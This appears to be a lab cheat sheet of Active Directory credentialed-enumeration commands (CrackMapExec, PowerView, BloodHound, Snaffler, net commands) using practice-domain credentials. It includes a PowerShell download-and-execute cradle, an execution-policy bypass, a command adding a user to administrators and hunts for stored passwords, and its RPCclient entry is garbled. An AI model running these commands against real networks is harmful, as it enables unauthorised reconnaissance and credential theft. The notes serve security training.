Credentialed Enumeration

Credentialed Enumeration - Linux

CrackMapExec

Domain User Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users

Domain Groups Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups

Domain Logged On Users

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users

Domain Share Searching

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap

List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>

Recursive List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only

RPCclient

UserEnum by RID

HTB_@cademy_stdnt! <RID>

WindapSearch

Search Domain Admins

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

Search Privileged Users

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

BloodHound-py

Enumerating Everything

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

Credentialed Enumeration - Windows

Active Directory PowerShell Module

# Import Module
Import-Module ActiveDirectory

Domain Info

Get-ADDomain

Users Info

Get-ADUser

Trust Relations

Get-ADTrust -Filter *

Group Info

Get-ADGroup -Filter * | select name

Detailed Group Info

Get-ADGroup -Identity <group-name>

Group Membership

Get-ADGroupMember -Identity <group-name>

PowerView

Domain Information

Get-Domain

Show Domain Controller

Get-DomainController

Show all Users

Get-DomainUser

Show All Computers

Get-DomainComputer

Show all Groups

Get-DomainGroup

Show specific OU objects in AD

Get-DomainOU

Show specific ACLs

Find-InterestingDomainAcl

Show members of a specific domain group

Get-DomainGroupMember

Show all GPO

Get-DomainGPO

Show User GPO Rights

# Change this to the user
$sid=Convert-NameToSid "Domain Users"

# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Show Domain Policy

Get-DomainPolicy

Show Local Groups

Get-NetLocalGroup

Show members of a specific local group

Get-NetLocalGroupMember

Show Domain Shares

Find-InterestingDomainShareFile

Show machines in the domain where the current user has local admin access

Find-LocalAdminAccess

Show Domain Trust

Get-DomainTrust

Show all forest trusts for the current forest or a specified forest

Get-ForestTrust

Map all domain trusts

Get-DomainTrustMapping

Find Password In Users Description

Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

Find users with PASSWD_NOTREQD set

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Find users with DONT_REQ_PREAUTH set

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Snaffler

https://github.com/SnaffCon/Snaffler

Snaffler helps acquire credentials or other sensitive data in an Active Directory environment. It works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

Credentialed Enumeration With Built-In Tools

Basic Enumeration Commands

# Prints the PC's Name
hostname

# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version

# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn

PowerShell Enumeration Commands

# Lists available modules loaded for use.
Get-Module

# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List

# Changes the execution policy for the current process only, via the -Scope parameter. The policy reverts once the process exits, so no permanent change is made to the host.
Set-ExecutionPolicy Bypass -Scope Process

# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value

# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

# Status Firewall
netsh advfirewall show allprofiles

# Status Windows Defender
Get-MpComputerStatus

Net Commands

# Information about password requirements
net accounts

# Password and lockout policy
net accounts /domain

# Information about domain groups
net group /domain

# List users with domain admin privileges
net group "Domain Admins" /domain

# List computer accounts joined to the domain
net group "domain computers" /domain

# List the computer accounts of the domain controllers
net group "Domain Controllers" /domain

# List users that belong to a given domain group
net group <domain_group_name> /domain

# List of domain groups
net groups /domain

# List users that belong to the Administrators group inside the domain (the Domain Admins group is included here by default)
net localgroup administrators /domain

# Add user to administrators
net localgroup administrators [username] /add

# Check current shares
net share

# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain

# List all users of the domain
net user /domain

# Get a list of computers
net view
